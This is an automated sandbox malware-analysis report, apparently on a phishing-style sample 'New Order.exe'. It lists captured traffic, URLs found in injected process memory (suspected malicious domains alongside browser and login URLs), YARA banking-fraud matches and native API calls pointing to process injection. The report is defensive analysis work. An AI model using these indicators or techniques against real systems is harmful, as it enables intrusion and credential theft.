Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Dec 2024 13:41:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-03T13:41:39.4849300Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://conseilnsaftogo.org/wp-json/>; rel="https://api.w.org/"Data Raw: 33 66 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 73 65 69 6c 6e 73 61 66 74 6f 67 6f 2e 6f 72 67 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 3a 20 33 30 30 30 70 78 20 31 35 30 30 70 78 20 7d 3c 2f 73 74 79 6c 65 3e 0a 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 38 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 
67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4e 53 41 46 20 2d 20 54 4f 47 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4e 53 41 46 20 2d 20 54 4f 47 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 53 41 46 20 2d 20 54 4f 47 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/Genetics_Online_College_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWN
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/__media__/design/underconstructionnotice.php?d=614genetics.online
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/__media__/js/trademark.php?d=614genetics.online&type=ns
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/display.cfm
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4636187188.00000000052B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4636187188.00000000052B9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/j7q9/
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r6
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000046F0000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003B70000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: w32tm.exe, 0000000E.00000002.4635164547.00000000040A8000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003528000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: w32tm.exe, 0000000E.00000003.2686317848.0000000007D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: w32tm.exe, 0000000E.00000003.2687423557.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4631373048.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: w32tm.exe, 0000000E.00000002.4637534779.0000000007DA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample. Static PE information: Filename: New Order.exe
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0042CE83 NtClose,8_2_0042CE83
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842B60 NtClose,LdrInitializeThunk,8_2_01842B60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_01842DF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_01842C70
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018435C0 NtCreateMutant,LdrInitializeThunk,8_2_018435C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01844340 NtSetContextThread,8_2_01844340
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01844650 NtSuspendThread,8_2_01844650
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842B80 NtQueryInformationFile,8_2_01842B80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BA0 NtEnumerateValueKey,8_2_01842BA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BE0 NtQueryValueKey,8_2_01842BE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842BF0 NtAllocateVirtualMemory,8_2_01842BF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AB0 NtWaitForSingleObject,8_2_01842AB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AD0 NtReadFile,8_2_01842AD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842AF0 NtWriteFile,8_2_01842AF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DB0 NtEnumerateKey,8_2_01842DB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842DD0 NtDelayExecution,8_2_01842DD0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D00 NtSetInformationFile,8_2_01842D00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D10 NtMapViewOfSection,8_2_01842D10
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842D30 NtUnmapViewOfSection,8_2_01842D30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CA0 NtQueryInformationToken,8_2_01842CA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CC0 NtQueryVirtualMemory,8_2_01842CC0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842CF0 NtOpenProcess,8_2_01842CF0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C00 NtQueryInformationProcess,8_2_01842C00
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842C60 NtCreateKey,8_2_01842C60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F90 NtProtectVirtualMemory,8_2_01842F90
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FA0 NtQuerySection,8_2_01842FA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FB0 NtResumeThread,8_2_01842FB0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842FE0 NtCreateFile,8_2_01842FE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F30 NtCreateSection,8_2_01842F30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842F60 NtCreateProcessEx,8_2_01842F60
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842E80 NtReadVirtualMemory,8_2_01842E80
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842EA0 NtAdjustPrivilegesToken,8_2_01842EA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842EE0 NtQueueApcThread,8_2_01842EE0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842E30 NtWriteVirtualMemory,8_2_01842E30
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843090 NtSetValueKey,8_2_01843090
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843010 NtOpenDirectoryObject,8_2_01843010
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018439B0 NtGetContextThread,8_2_018439B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843D10 NtOpenProcessToken,8_2_01843D10
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01843D70 NtOpenThread,8_2_01843D70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E4340 NtSetContextThread,LdrInitializeThunk,14_2_033E4340
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E4650 NtSuspendThread,LdrInitializeThunk,14_2_033E4650
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2B60 NtClose,LdrInitializeThunk,14_2_033E2B60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_033E2BA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_033E2BF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_033E2BE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AF0 NtWriteFile,LdrInitializeThunk,14_2_033E2AF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AD0 NtReadFile,LdrInitializeThunk,14_2_033E2AD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F30 NtCreateSection,LdrInitializeThunk,14_2_033E2F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FB0 NtResumeThread,LdrInitializeThunk,14_2_033E2FB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FE0 NtCreateFile,LdrInitializeThunk,14_2_033E2FE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_033E2E80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_033E2EE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_033E2D30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_033E2D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_033E2DF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DD0 NtDelayExecution,LdrInitializeThunk,14_2_033E2DD0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_033E2C70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C60 NtCreateKey,LdrInitializeThunk,14_2_033E2C60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_033E2CA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E35C0 NtCreateMutant,LdrInitializeThunk,14_2_033E35C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E39B0 NtGetContextThread,LdrInitializeThunk,14_2_033E39B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2B80 NtQueryInformationFile,14_2_033E2B80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2AB0 NtWaitForSingleObject,14_2_033E2AB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F60 NtCreateProcessEx,14_2_033E2F60
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2FA0 NtQuerySection,14_2_033E2FA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2F90 NtProtectVirtualMemory,14_2_033E2F90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2E30 NtWriteVirtualMemory,14_2_033E2E30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2EA0 NtAdjustPrivilegesToken,14_2_033E2EA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2D00 NtSetInformationFile,14_2_033E2D00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2DB0 NtEnumerateKey,14_2_033E2DB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2C00 NtQueryInformationProcess,14_2_033E2C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CF0 NtOpenProcess,14_2_033E2CF0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E2CC0 NtQueryVirtualMemory,14_2_033E2CC0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3010 NtOpenDirectoryObject,14_2_033E3010
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3090 NtSetValueKey,14_2_033E3090
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3D10 NtOpenProcessToken,14_2_033E3D10
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E3D70 NtOpenThread,14_2_033E3D70
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979A30 NtCreateFile,14_2_00979A30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979BA0 NtReadFile,14_2_00979BA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979C90 NtDeleteFile,14_2_00979C90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979D30 NtClose,14_2_00979D30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00979EA0 NtAllocateVirtualMemory,14_2_00979EA0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01819EB08_2_01819EB0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346A35214_2_0346A352
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034703E614_2_034703E6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BE3F014_2_033BE3F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345027414_2_03450274
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034302C014_2_034302C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0343815814_2_03438158
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A010014_2_033A0100
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344A11814_2_0344A118
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034681CC14_2_034681CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034641A214_2_034641A2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034701AA14_2_034701AA
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344200014_2_03442000
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B077014_2_033B0770
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033D475014_2_033D4750
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AC7C014_2_033AC7C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CC6E014_2_033CC6E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B053514_2_033B0535
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347059114_2_03470591
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346244614_2_03462446
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345442014_2_03454420
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345E4F614_2_0345E4F6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346AB4014_2_0346AB40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03466BD714_2_03466BD7
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AEA8014_2_033AEA80
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C696214_2_033C6962
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B29A014_2_033B29A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347A9A614_2_0347A9A6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B284014_2_033B2840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BA84014_2_033BA840
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033968B814_2_033968B8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033DE8F014_2_033DE8F0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03424F4014_2_03424F40
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033D0F3014_2_033D0F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F2F2814_2_033F2F28
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03452F3014_2_03452F30
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BCFE014_2_033BCFE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0342EFA014_2_0342EFA0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A2FC814_2_033A2FC8
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346EE2614_2_0346EE26
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B0E5914_2_033B0E59
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346EEDB14_2_0346EEDB
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C2E9014_2_033C2E90
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346CE9314_2_0346CE93
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BAD0014_2_033BAD00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0344CD1F14_2_0344CD1F
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033C8DBF14_2_033C8DBF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033AADE014_2_033AADE0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B0C0014_2_033B0C00
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A0CF214_2_033A0CF2
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_03450CB514_2_03450CB5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346132D14_2_0346132D
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0339D34C14_2_0339D34C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033F739A14_2_033F739A
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033B52A014_2_033B52A0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034512ED14_2_034512ED
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033CB2C014_2_033CB2C0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0347B16B14_2_0347B16B
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0339F17214_2_0339F172
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033E516C14_2_033E516C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033BB1B014_2_033BB1B0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0345F0CC14_2_0345F0CC
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0346F0E014_2_0346F0E0
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_034670E914_2_034670E9
